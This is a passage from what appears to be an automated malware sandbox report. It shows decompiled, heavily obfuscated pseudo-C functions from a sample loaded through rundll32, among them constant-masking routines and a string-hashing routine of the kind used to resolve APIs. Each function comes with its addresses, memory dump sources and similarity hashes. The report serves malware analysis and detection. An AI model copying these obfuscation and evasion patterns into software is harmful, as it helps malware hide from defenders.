				_v24 = _v24 / _t87;
				_v24 = _v24 ^ 0x000eb9f7;
				_v12 = 0x832b1f;
				_v12 = _v12 << 5;
				_v12 = _v12 | 0x242a8544;
				_v12 = _v12 ^ 0x346a2866;
				_v8 = 0x6a77bb;
				_v8 = _v8 >> 0xe;
				_t88 = 0x19;
				_v8 = _v8 / _t88;
				_v8 = _v8 ^ 0x9d9369f0;
				_v8 = _v8 ^ 0x9d908f3a;
				_v20 = 0x4802c8;
				_t89 = 0x21;
				_v20 = _v20 / _t89;
				_v20 = _v20 + 0xffffbfc3;
				_v20 = _v20 ^ 0x000df493;
				do {
					while(_t72 != 0x9835b86) {
						if(_t72 == 0xe98fb1d) {
							_push(_t72);
							_push(_t72);
							 *0x7b3e04 = E00797FF2(0x134);
							_t72 = 0x9835b86;
							continue;
						}
						goto L5;
					}
					_t83 =  *0x7b3e04; // 0x0
					E007A0001(_v8, _t83 + 0x18, _v20);
					_t72 = 0x7dce4e4;
					L5:
				} while (_t72 != 0x7dce4e4);
				return 1;
			}















                                                                                                                          0x007951c1
                                                                                                                          0x007951c7
                                                                                                                          0x007951ce
                                                                                                                          0x007951d5
                                                                                                                          0x007951e2
                                                                                                                          0x007951ea
                                                                                                                          0x007951f1
                                                                                                                          0x007951f3
                                                                                                                          0x00795202
                                                                                                                          0x00795207
                                                                                                                          0x0079520c
                                                                                                                          0x00795213
                                                                                                                          0x0079521a
                                                                                                                          0x0079521e
                                                                                                                          0x00795225
                                                                                                                          0x0079522c
                                                                                                                          0x00795233
                                                                                                                          0x0079523a
                                                                                                                          0x0079523f
                                                                                                                          0x00795244
                                                                                                                          0x0079524b
                                                                                                                          0x00795252
                                                                                                                          0x0079525c
                                                                                                                          0x00795264
                                                                                                                          0x00795267
                                                                                                                          0x0079526e
                                                                                                                          0x00795275
                                                                                                                          0x00795275
                                                                                                                          0x0079527b
                                                                                                                          0x0079528b
                                                                                                                          0x0079528c
                                                                                                                          0x00795294
                                                                                                                          0x00795299
                                                                                                                          0x00000000
                                                                                                                          0x00795299
                                                                                                                          0x00000000
                                                                                                                          0x0079527b
                                                                                                                          0x007952a0
                                                                                                                          0x007952ac
                                                                                                                          0x007952b2
                                                                                                                          0x007952b4
                                                                                                                          0x007952b4
                                                                                                                          0x007952c1

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: f(j4
                                                                                                                          • API String ID: 0-3086030595
                                                                                                                          • Opcode ID: 92d1b2218c7a94b62be81d106e6ed868b3fea89a8d8e73e3ff8173736f61a9bb
                                                                                                                          • Instruction ID: b6ce90de867de2c09a8efd1f3df593ec7e923272cdad71861c6bde3381e8b1ac
                                                                                                                          • Opcode Fuzzy Hash: 92d1b2218c7a94b62be81d106e6ed868b3fea89a8d8e73e3ff8173736f61a9bb
                                                                                                                          • Instruction Fuzzy Hash: 80314971E01219EBCF09DFAAD9895EEBBB1FB44324F208199E505AB250D3B85F45CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00792051 Relevance: 1.3, Strings: 1, Instructions: 80COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E00792051(void* __edx, signed int _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _t71;
				signed int _t78;
				signed int _t80;
				signed int _t83;
				signed int _t92;
				signed int _t95;
				signed short* _t97;

				_push(_a8);
				_t97 = _a4;
				_push(_t97);
				E007A20B9(_t71);
				_v16 = 0x71ca23;
				_v12 = 0x57f692;
				_v8 = 0;
				_v4 = 0;
				_v20 = 0xd3252c;
				_v20 = _v20 + 0x4351;
				_v20 = _v20 + 0xffff5b79;
				_v20 = _v20 ^ 0x00d2c3f6;
				_a4 = 0xbb067e;
				_t83 = 0x11;
				_a4 = _a4 / _t83;
				_a4 = _a4 >> 8;
				_a4 = _a4 ^ 0xac5d3832;
				_a4 = _a4 ^ 0xac5d3334;
				_a4 = 0xab60c2;
				_a4 = _a4 << 0x10;
				_a4 = _a4 ^ 0x910d5570;
				_a4 = _a4 >> 4;
				_a4 = _a4 ^ 0x0f1cf547;
				if( *_t97 != 0) {
					do {
						_t80 = _v20;
						_a4 = 0xbb067e;
						_a4 = _a4 / _t83;
						_a4 = _a4 >> 8;
						_a4 = _a4 ^ 0xac5d3832;
						_a4 = _a4 ^ 0xac5d3334;
						_a4 = 0xab60c2;
						_a4 = _a4 << 0x10;
						_a4 = _a4 ^ 0x910d5570;
						_a4 = _a4 >> 4;
						_a4 = _a4 ^ 0x0f1cf547;
						_t92 = _v20 << _a4;
						_t78 =  *_t97 & 0x0000ffff;
						_t95 = _v20 << _a4;
						if(_t78 >= 0x41 && _t78 <= 0x5a) {
							_t78 = _t78 + 0x20;
						}
						_v20 = _t78;
						_t97 =  &(_t97[1]);
						_v20 = _v20 + _t92;
						_v20 = _v20 + _t95;
						_v20 = _v20 - _t80;
						_t83 = 0x11;
					} while ( *_t97 != 0);
				}
				return _v20;
			}















                                                                                                                          0x00792056
                                                                                                                          0x0079205a
                                                                                                                          0x0079205e
                                                                                                                          0x00792061
                                                                                                                          0x00792066
                                                                                                                          0x00792070
                                                                                                                          0x0079207b
                                                                                                                          0x00792081
                                                                                                                          0x00792085
                                                                                                                          0x0079208d
                                                                                                                          0x00792095
                                                                                                                          0x0079209d
                                                                                                                          0x007920a5
                                                                                                                          0x007920b3
                                                                                                                          0x007920b6
                                                                                                                          0x007920ba
                                                                                                                          0x007920bf
                                                                                                                          0x007920c7
                                                                                                                          0x007920cf
                                                                                                                          0x007920d7
                                                                                                                          0x007920dc
                                                                                                                          0x007920e4
                                                                                                                          0x007920e9
                                                                                                                          0x007920f4
                                                                                                                          0x007920fc
                                                                                                                          0x007920fc
                                                                                                                          0x00792102
                                                                                                                          0x00792110
                                                                                                                          0x00792114
                                                                                                                          0x00792119
                                                                                                                          0x00792121
                                                                                                                          0x00792131
                                                                                                                          0x00792139
                                                                                                                          0x0079213e
                                                                                                                          0x00792146
                                                                                                                          0x0079214b
                                                                                                                          0x00792153
                                                                                                                          0x0079215d
                                                                                                                          0x00792160
                                                                                                                          0x00792165
                                                                                                                          0x0079216c
                                                                                                                          0x0079216c
                                                                                                                          0x0079216f
                                                                                                                          0x00792173
                                                                                                                          0x00792176
                                                                                                                          0x0079217a
                                                                                                                          0x0079217e
                                                                                                                          0x00792184
                                                                                                                          0x00792185
                                                                                                                          0x0079218f
                                                                                                                          0x00792199

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: QC
                                                                                                                          • API String ID: 0-229404352
                                                                                                                          • Opcode ID: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                          • Instruction ID: b72ab1f7d3f2b682ec2c1555d0033ba1a0f5a4420739cfdbd0ce90f47da754fe
                                                                                                                          • Opcode Fuzzy Hash: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                          • Instruction Fuzzy Hash: 153117715083819BD315DF29D48905BBBE0FFC87A8F548E1DF4C9A2225D3B4C689CB5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A176B Relevance: 1.3, Strings: 1, Instructions: 75COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E007A176B(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _t87;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				void* _t102;
				signed int _t103;

				_v36 = _v36 & 0x00000000;
				_v40 = 0x355323;
				_v24 = 0x6eb9b5;
				_v24 = _v24 + 0x6c21;
				_t102 = __ecx;
				_t91 = 0x64;
				_v24 = _v24 / _t91;
				_v24 = _v24 ^ 0x0005c519;
				_v32 = 0xba69a0;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x5d3c95d0;
				_v20 = 0x99612d;
				_v20 = _v20 | 0x6bf7bfaf;
				_v20 = _v20 + 0x66ac;
				_v20 = _v20 ^ 0x6c036c89;
				_v16 = 0xd72900;
				_v16 = _v16 + 0xffff2462;
				_v16 = _v16 ^ 0xa7b97bfd;
				_v16 = _v16 + 0xffff7578;
				_v16 = _v16 ^ 0xa76084ba;
				_v12 = 0xeb6610;
				_t92 = 0x6f;
				_v12 = _v12 / _t92;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0x2e835447;
				_v12 = _v12 ^ 0x21f4cf0c;
				_v28 = 0x644f8d;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xa;
				_v28 = _v28 ^ 0x89f1a004;
				_v8 = 0xbb77ef;
				_t93 = 0x72;
				_v8 = _v8 * 0x3c;
				_v8 = _v8 / _t93;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0x18aaba50;
				_t87 = E007A0AE0(_v8, _v28);
				_push(_v12);
				_t103 = _t87;
				_push(_t102);
				_push(_t103);
				_push(3);
				E007980E3(_v20, _v16);
				 *((short*)(_t102 + _t103 * 2)) = 0;
				return 0;
			}


















                                                                                                                          0x007a1771
                                                                                                                          0x007a1777
                                                                                                                          0x007a177e
                                                                                                                          0x007a1785
                                                                                                                          0x007a1793
                                                                                                                          0x007a1795
                                                                                                                          0x007a179a
                                                                                                                          0x007a179f
                                                                                                                          0x007a17a6
                                                                                                                          0x007a17ad
                                                                                                                          0x007a17b1
                                                                                                                          0x007a17b8
                                                                                                                          0x007a17bf
                                                                                                                          0x007a17c6
                                                                                                                          0x007a17cd
                                                                                                                          0x007a17d4
                                                                                                                          0x007a17db
                                                                                                                          0x007a17e2
                                                                                                                          0x007a17e9
                                                                                                                          0x007a17f0
                                                                                                                          0x007a17f7
                                                                                                                          0x007a1801
                                                                                                                          0x007a1806
                                                                                                                          0x007a180b
                                                                                                                          0x007a180f
                                                                                                                          0x007a1816
                                                                                                                          0x007a181d
                                                                                                                          0x007a1824
                                                                                                                          0x007a1828
                                                                                                                          0x007a182c
                                                                                                                          0x007a1833
                                                                                                                          0x007a183e
                                                                                                                          0x007a183f
                                                                                                                          0x007a1847
                                                                                                                          0x007a184a
                                                                                                                          0x007a184e
                                                                                                                          0x007a1861
                                                                                                                          0x007a1866
                                                                                                                          0x007a186c
                                                                                                                          0x007a1871
                                                                                                                          0x007a1872
                                                                                                                          0x007a1873
                                                                                                                          0x007a1875
                                                                                                                          0x007a187f
                                                                                                                          0x007a1888

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: #S5
                                                                                                                          • API String ID: 0-40889119
                                                                                                                          • Opcode ID: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                          • Instruction ID: a84dbf6a563248743946377fcd37e4c80757beae4fbd5ca7a777b0d472b5a740
                                                                                                                          • Opcode Fuzzy Hash: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                          • Instruction Fuzzy Hash: 293132B2D0020AEBCB48DFE5C94AAEEBBB1FB84304F20809AD515B6250D7B50B15CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007B09B5 Relevance: 1.3, Strings: 1, Instructions: 71COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E007B09B5(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _t77;
				signed int _t88;
				signed int _t89;

				_v40 = _v40 & 0x00000000;
				_v32 = 4;
				_v52 = 0xab6069;
				_v48 = 0xcf1f96;
				_v44 = 0x29044d;
				_v24 = 0xea6416;
				_v24 = _v24 | 0x7adbff7d;
				_v24 = _v24 ^ 0x5afbff7f;
				_v16 = 0x725236;
				_v16 = _v16 + 0xffff3c91;
				_v16 = _v16 << 7;
				_t88 = 0x2b;
				_v16 = _v16 / _t88;
				_v16 = _v16 ^ 0x015653a2;
				_v12 = 0xbf3984;
				_v12 = _v12 ^ 0x457d3893;
				_t89 = 0x44;
				_v12 = _v12 / _t89;
				_v12 = _v12 + 0x25bc;
				_v12 = _v12 ^ 0x0106bc10;
				_v20 = 0xd655eb;
				_v20 = _v20 | 0x2344b0aa;
				_v20 = _v20 * 0x16;
				_v20 = _v20 ^ 0x147fb4df;
				_v8 = 0x70d8dc;
				_v8 = _v8 + 0xe534;
				_v8 = _v8 ^ 0xb5155b0d;
				_v8 = _v8 >> 7;
				_v8 = _v8 ^ 0x01640b3f;
				_v28 = 0x2d9f47;
				_v28 = _v28 + 0xffffba71;
				_v28 = _v28 ^ 0x002c2593;
				_t77 = E007994EE(_v16, __ecx, _v24 | __edx, __ecx,  &_v36, _v20, _v8,  &_v32, _v28);
				asm("sbb eax, eax");
				return  ~_t77 & _v36;
			}


















                                                                                                                          0x007b09bb
                                                                                                                          0x007b09bf
                                                                                                                          0x007b09c6
                                                                                                                          0x007b09cd
                                                                                                                          0x007b09d4
                                                                                                                          0x007b09db
                                                                                                                          0x007b09e2
                                                                                                                          0x007b09e9
                                                                                                                          0x007b09f0
                                                                                                                          0x007b09f7
                                                                                                                          0x007b09fe
                                                                                                                          0x007b0a09
                                                                                                                          0x007b0a12
                                                                                                                          0x007b0a17
                                                                                                                          0x007b0a1e
                                                                                                                          0x007b0a25
                                                                                                                          0x007b0a2f
                                                                                                                          0x007b0a32
                                                                                                                          0x007b0a35
                                                                                                                          0x007b0a3c
                                                                                                                          0x007b0a43
                                                                                                                          0x007b0a4a
                                                                                                                          0x007b0a55
                                                                                                                          0x007b0a5b
                                                                                                                          0x007b0a62
                                                                                                                          0x007b0a69
                                                                                                                          0x007b0a70
                                                                                                                          0x007b0a77
                                                                                                                          0x007b0a7b
                                                                                                                          0x007b0a82
                                                                                                                          0x007b0a89
                                                                                                                          0x007b0a90
                                                                                                                          0x007b0ab3
                                                                                                                          0x007b0abd
                                                                                                                          0x007b0ac7

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 6Rr
                                                                                                                          • API String ID: 0-3911282678
                                                                                                                          • Opcode ID: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                          • Instruction ID: 5e0d917fb6fb8076da878fc40c8a7ed28345005f89f942472155c24f8111830c
                                                                                                                          • Opcode Fuzzy Hash: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                          • Instruction Fuzzy Hash: 453100B1D0021EEBDB04CFA5C94A9EEFBB5FB44318F108599D121B6250D3B85A49CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A8519 Relevance: 1.3, Strings: 1, Instructions: 49COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 91%
                                                                                                                          			E007A8519(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t55;

				_push(_a4);
				_push(__ecx);
				E007A20B9(_t55);
				_v8 = 0x519131;
				_v8 = _v8 ^ 0xec4619ea;
				_v8 = _v8 + 0x48c3;
				_v8 = _v8 ^ 0x9760daa2;
				_v8 = _v8 ^ 0x7b7f7884;
				_v16 = 0xb689a0;
				_v16 = _v16 + 0x133d;
				_v16 = _v16 ^ 0x00b72bb6;
				_v12 = 0xec38eb;
				_v12 = _v12 * 0x68;
				_v12 = _v12 | 0x70f3e2c1;
				_v12 = _v12 + 0xd290;
				_v12 = _v12 ^ 0x7ff36ca2;
				_v12 = 0x452aa4;
				_v12 = _v12 ^ 0xbb670255;
				_v12 = _v12 >> 1;
				_v12 = _v12 * 0x2d;
				_v12 = _v12 ^ 0x7280165f;
				_v24 = 0xb68a33;
				_v24 = _v24 + 0xffff2941;
				_v24 = _v24 ^ 0x00b92c3b;
				_v12 = 0x340add;
				_v12 = _v12 | 0xd5e1d7f7;
				_v12 = _v12 ^ 0xd5f6168b;
				_v20 = 0x853d17;
				_v20 = _v20 + 0xcd4d;
				_v20 = _v20 ^ 0x00837917;
				return E0079A30C(_v12, _a4, E00791DB9(__ecx), _v20);
			}









                                                                                                                          0x007a851f
                                                                                                                          0x007a8523
                                                                                                                          0x007a8524
                                                                                                                          0x007a8529
                                                                                                                          0x007a8530
                                                                                                                          0x007a8537
                                                                                                                          0x007a853e
                                                                                                                          0x007a8545
                                                                                                                          0x007a854c
                                                                                                                          0x007a8553
                                                                                                                          0x007a855a
                                                                                                                          0x007a8561
                                                                                                                          0x007a856c
                                                                                                                          0x007a856f
                                                                                                                          0x007a8576
                                                                                                                          0x007a857d
                                                                                                                          0x007a8584
                                                                                                                          0x007a858b
                                                                                                                          0x007a8592
                                                                                                                          0x007a8599
                                                                                                                          0x007a859c
                                                                                                                          0x007a85a3
                                                                                                                          0x007a85aa
                                                                                                                          0x007a85b1
                                                                                                                          0x007a85b8
                                                                                                                          0x007a85bf
                                                                                                                          0x007a85c6
                                                                                                                          0x007a85cd
                                                                                                                          0x007a85d4
                                                                                                                          0x007a85db
                                                                                                                          0x007a8605

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 8
                                                                                                                          • API String ID: 0-719543824
                                                                                                                          • Opcode ID: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                          • Instruction ID: 0fc045d55c45c7c51297ab2cfc83e67ebb000605038bb91e3a2d02dca21ff2ea
                                                                                                                          • Opcode Fuzzy Hash: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                          • Instruction Fuzzy Hash: 5621B2B6C00209EBCF48DFE5DA8689EBFB5FF40314F608189E411B6261D3B54B54DB95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100323E2 Relevance: .4, Instructions: 384COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                          • Instruction ID: 1bfcaf43c27c81d10410876f8fc1d5c1a29ddf16da4e3393733b86403839c423
                                                                                                                          • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                          • Instruction Fuzzy Hash: 2CD15C73C0E9F70E8377C12E506866AEAB2AFC298271FC3E1DCD42F689D2265D1195D0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10031FC2 Relevance: .4, Instructions: 378COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                          • Instruction ID: 82a22fea4dee095689a33f7c41869eea601d71afe1f9cce3cb1ebeaf0be2af07
                                                                                                                          • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                          • Instruction Fuzzy Hash: 0BD16A73C0E9B70E8376C12E54A866BEAB2AFC158271FC3A1DCD02F689D6269D0595D0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10031BB6 Relevance: .4, Instructions: 361COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                          • Instruction ID: 4b1b82cb2a868ffe554c354e232f2920846bc0ab95f092044db9cceed5b195f9
                                                                                                                          • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                          • Instruction Fuzzy Hash: 3BC17F77C1E9B70E8377C12E44A85AAEAB2AFC659271FC3E1CCD43F689D2265D0185D0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100317E2 Relevance: .4, Instructions: 351COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                          • Instruction ID: b56b4bdd56439ea2f6f9f3f119f05c546accd6e672066d429c0e352e3a467874
                                                                                                                          • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                          • Instruction Fuzzy Hash: 58C18273D0E9B70E8377C12E44A85AAEEB2AFC558271FC3E1CCD42F289E6265D0595D0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00794346 Relevance: .2, Instructions: 173COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E00794346(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				void* _t146;
				void* _t165;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				void* _t177;
				intOrPtr* _t196;
				void* _t197;
				signed int* _t200;

				_push(_a8);
				_t196 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t146);
				_v8 = 0x1587dd;
				_t200 =  &(( &_v72)[4]);
				_t197 = 0;
				_v4 = _v4 & 0;
				_t177 = 0x762b00a;
				_v40 = 0x54d1b5;
				_t170 = 0x79;
				_v40 = _v40 / _t170;
				_v40 = _v40 ^ 0x0000b372;
				_v16 = 0xa1afdd;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0000050c;
				_v68 = 0x910a11;
				_t171 = 0x13;
				_v68 = _v68 / _t171;
				_v68 = _v68 << 2;
				_v68 = _v68 + 0x13e3;
				_v68 = _v68 ^ 0x00184f98;
				_v32 = 0xaf4665;
				_t172 = 0x26;
				_v32 = _v32 * 0x1c;
				_v32 = _v32 ^ 0x13220c8d;
				_v56 = 0xf39368;
				_v56 = _v56 + 0xf012;
